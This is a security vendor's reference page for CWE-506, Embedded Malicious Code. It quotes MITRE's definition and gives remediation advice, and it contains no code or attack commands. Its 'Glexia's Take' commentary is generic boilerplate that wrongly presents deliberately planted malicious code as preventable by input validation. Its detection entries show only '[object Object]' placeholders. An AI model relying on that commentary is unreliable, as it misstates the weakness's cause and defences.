Live Active security incident? Get immediate response
CWE Reference

CWE-506: Embedded Malicious Code

Official CWE-506 CWE context with Glexia analysis, remediation guidance, related CVEs, and ATT&CK context.

Release 4.20weaknessIncomplete
Search CWE CWE Dictionary

Glexia's Take

CWE-506: Embedded Malicious Code

Embedded Malicious Code represents a recurring weakness pattern that can create exploitable paths when design, validation, or implementation controls are missing.

Executive Impact

  • Confidentiality,Integrity,Availability: Execute Unauthorized Code or Commands

Developer Pattern

CWE-506 is the kind of defect developers can usually prevent with explicit validation, safer framework defaults, and tests that exercise hostile input or unsafe state transitions.

Confidence

high confidence from CWE-506, 4.20.

Official CWE Definition

CWE-506: Embedded Malicious Code

The product contains code that appears to be malicious in nature.

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

Type
weakness
Abstraction
Class
Status
Incomplete
Source
MITRE CWE definition

Developer And Remediation Guidance

How teams prevent and detect this weakness

Causes

  • In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.

Remediation

  • Implementation,Operation: Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

Detection

  • Manual Static Analysis - Binary or Bytecode: [object Object]
  • Dynamic Analysis with Manual Results Interpretation: [object Object]
  • Manual Static Analysis - Source Code: [object Object]
  • Automated Static Analysis: [object Object]

Mappings

Related CVEs, CWEs, and ATT&CK context

Related CWEs

Related CVEs

Related CVE mappings appear after CVE records are cross-indexed.

Open CWE CVE mapping

ATT&CK Relevance

ATT&CK relevance is shown only when reviewed or responsibly inferred.